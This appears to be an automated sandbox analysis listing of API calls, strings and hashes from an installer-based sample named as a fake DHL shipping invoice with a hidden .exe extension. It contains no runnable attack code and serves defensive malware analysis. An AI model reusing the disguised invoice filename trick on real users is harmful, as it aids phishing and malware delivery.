                                                                                                                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                                                                                                      • *?|<>/":, xrefs: 004065A0
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", xrefs: 0040654E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 589700163-1717150234
                                                                                                                                                                                                                                      • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                                      • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                                      • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041DA00,757C23A0), ref: 0040537D
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                                      • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                                      • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                                      • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                      • String ID: Calibri
                                                                                                                                                                                                                                      • API String ID: 3808545654-1409258342
                                                                                                                                                                                                                                      • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                                      • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000BA9AF,00000064,000BA9B3), ref: 00402E3C
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                      • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                                      • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 73A4121B: GlobalAlloc.KERNELBASE(00000040,?,73A4123B,?,73A412DF,00000019,73A411BE,-000000A0), ref: 73A41225
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 73A42657
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A4268C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: 0d1923f4f36ced56c5a71026722287f23071eec341e1045fa9e336b7e9f6f73b
                                                                                                                                                                                                                                      • Instruction ID: 3c34a98c75914cc56c4aff749b760dc02bcc810cad127c220d4325cb7296c6df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d1923f4f36ced56c5a71026722287f23071eec341e1045fa9e336b7e9f6f73b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB311072104109DFDB169F5CD886F2ABBBAFFC5300324512EF546C3268C73A9826CB15
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                                      • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                                      • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsn7D60.tmp$C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll
                                                                                                                                                                                                                                      • API String ID: 3109718747-3024469152
                                                                                                                                                                                                                                      • Opcode ID: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
                                                                                                                                                                                                                                      • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a92599d19568ff8bc05a4b5855478ddca432145c4c7b47034acc93206d5566
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A424D6
                                                                                                                                                                                                                                        • Part of subcall function 73A4122C: lstrcpynW.KERNEL32(00000000,?,73A412DF,00000019,73A411BE,-000000A0), ref: 73A4123C
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 73A4245C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73A42477
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4216380887-0
                                                                                                                                                                                                                                      • Opcode ID: d20324da5da396d72815d71074d9d326d88ecf6b08a39215f1f4478e0aecb37b
                                                                                                                                                                                                                                      • Instruction ID: df5bf89b014223dbed62571bb481d22fccceb12f5e8cdf3a4ef2ba4db82672db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d20324da5da396d72815d71074d9d326d88ecf6b08a39215f1f4478e0aecb37b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841BEB1004309DFE314EF2DE846B6677B8FB98310F20592FE44A87699EB75A485CB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73A421EC,?,00000808), ref: 73A41635
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73A421EC,?,00000808), ref: 73A4163C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73A421EC,?,00000808), ref: 73A41650
